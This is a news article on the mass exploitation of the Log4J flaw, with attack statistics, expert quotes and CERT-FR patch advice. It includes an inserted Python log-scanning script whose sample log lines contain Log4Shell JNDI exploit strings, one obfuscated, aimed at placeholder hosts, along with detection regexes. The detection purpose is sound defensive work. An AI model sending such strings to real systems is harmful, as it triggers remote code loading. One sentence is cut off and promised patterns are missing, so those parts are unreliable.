More than 840,000 attacks have been launched trying to take advantage of the Log4J flaw

Recently we commented on the Log4J flaw, and in this post we would like to share what researchers are reporting: hackers, including groups backed by the Chinese state and by Russia, have launched more than 840,000 attacks against companies around the world since last Friday through this vulnerability.

The cybersecurity company Check Point said that attacks related to the vulnerability had accelerated in the 72 hours since Friday, and that at times its researchers were seeing more than 100 attacks per minute.

The company also noted great creativity in adapting the attack: sometimes more than 60 new variations appear in less than 24 hours, introducing new obfuscation or encoding techniques.

"Chinese government attackers" are among those involved, according to Charles Carmakal, chief technology officer of the cybersecurity company Mandiant.

The Log4J flaw allows attackers to take remote control of computers running Java applications.

Jen Easterly, director of the United States Cybersecurity and Infrastructure Security Agency (CISA), told industry executives that the vulnerability was "one of the most serious I have seen in my entire career, if not the most serious", according to US media. Hundreds of millions of devices are likely to be affected, she said.

Check Point said that in many cases, hackers take over computers and use them to mine cryptocurrencies or make them part of botnets, vast networks of compromised computers that can be used to overwhelm websites with traffic, send spam, or serve other illegal purposes.

According to Kaspersky, most of the attacks come from Russia.

CISA and the UK's National Cyber Security Centre have issued alerts urging organizations to apply the updates related to the Log4J vulnerability, as experts try to assess the consequences.

Amazon, Apple, IBM, Microsoft, and Cisco are among those rushing to roll out solutions, but no serious breaches have been publicly reported until

The vulnerability is the latest to affect corporate networks, after vulnerabilities emerged over the past year in widely used software from Microsoft and from the IT company SolarWinds. Both vulnerabilities were reportedly first exploited by state-backed espionage groups from China and Russia, respectively.

Mandiant's Carmakal said Chinese state-backed actors are also trying to exploit the Log4J bug, but he declined to share further details. SentinelOne researchers also told the media that they had observed Chinese hackers taking advantage of the vulnerability.

CERT-FR recommends a thorough analysis of network logs. The following patterns can be used to identify an attempt to exploit this vulnerability when they appear in URLs or in certain HTTP headers, such as User-Agent.

It is strongly recommended to upgrade to log4j version 2.15.0 as soon as possible. However, if migrating to this version is difficult, the following workaround can be applied temporarily:
For applications that use versions 2.7.0 and later of the log4j library, it is possible to protect against the attack by modifying the format of the logged events with the syntax %m{nolookups} for the data that the user provides.
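The log analysis recommended above can be scripted. The following is an added example, not code from the article or from CERT-FR, and the log lines and detection patterns in it are my own constructed assumptions rather than the CERT-FR list: it URL-decodes each access-log line, collapses the nested lookups that the article mentions attackers use for obfuscation (`${lower:...}`, `${upper:...}` and the `${...:-default}` fallback syntax), and then flags any line containing a JNDI lookup, while also reporting any other `${...}` lookup as suspicious for triage.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format), not taken from the article.
# The hostnames use the reserved .invalid TLD so they resolve nowhere.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:25 +0000] "GET /login?user=${jndi:ldap://example.invalid/a} HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:26 +0000] "GET / HTTP/1.1" 200 312 "-" "${${lower:j}ndi:rmi://example.invalid/b}"',
    '10.0.0.7 - - [13/Dec/2021:10:01:30 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 100 "-" "curl/7.79"',
]

# Innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Any remaining lookup after normalization.
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")
# A JNDI lookup, which is what a vulnerable log4j would resolve.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested obfuscating lookups from the inside out so that the
    logical payload becomes visible to a plain substring match.

    Only three shapes are collapsed (an assumption of this example):
      ${lower:X}      -> X.lower()
      ${upper:X}      -> X.upper()
      ${name:-X}      -> X   (log4j default-value syntax when a lookup fails)
    Everything else is left untouched.
    """
    for _ in range(max_rounds):
        changed = False

        def replace(match: re.Match) -> str:
            nonlocal changed
            body = match.group(1)
            if ":-" in body:
                changed = True
                return body.split(":-", 1)[1]
            for prefix, transform in (("lower:", str.lower), ("upper:", str.upper)):
                if body.lower().startswith(prefix):
                    changed = True
                    return transform(body[len(prefix):])
            return match.group(0)

        text = INNERMOST_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def classify(line: str) -> str:
    """Return 'exploit_attempt', 'suspicious_lookup' or 'clean' for one log line."""
    decoded = unquote(line)          # attackers commonly URL-encode the '${' characters
    normalized = normalize(decoded)
    if JNDI_LOOKUP.search(normalized):
        return "exploit_attempt"
    if ANY_LOOKUP.search(normalized):
        return "suspicious_lookup"   # a lookup that is not JNDI still warrants a look
    return "clean"


def scan(lines) -> list:
    """Classify every line and return the flagged ones as (verdict, line) pairs."""
    return [(classify(line), line) for line in lines if classify(line) != "clean"]


if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG_LINES):
        print(f"{verdict:18} {line}")
```

Run it over a real access log by replacing `SAMPLE_LOG_LINES` with the file's lines; the normalization step is what keeps the JNDI match from being defeated by the nested-lookup variants, and the separate "suspicious_lookup" verdict surfaces new variants that the collapse rules do not yet cover.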

Almost half of all attacks have been carried out by known cyber attackers, according to Check Point. These included groups that use Tsunami and Mirai, malware that turns devices into botnets, networks used to launch remotely controlled attacks such as denial-of-service attacks. They also included groups that use XMRig, mining software for the Monero digital currency.

"With this vulnerability, attackers gain almost unlimited power: they can extract confidential data, upload files to the server, delete data, install ransomware or pivot to other servers," said Nicholas Sciberras, chief engineering officer at the vulnerability scanner vendor Acunetix. It was "surprisingly easy" to carry out an attack, he said, adding that the flaw would be "exploited in the next few months."
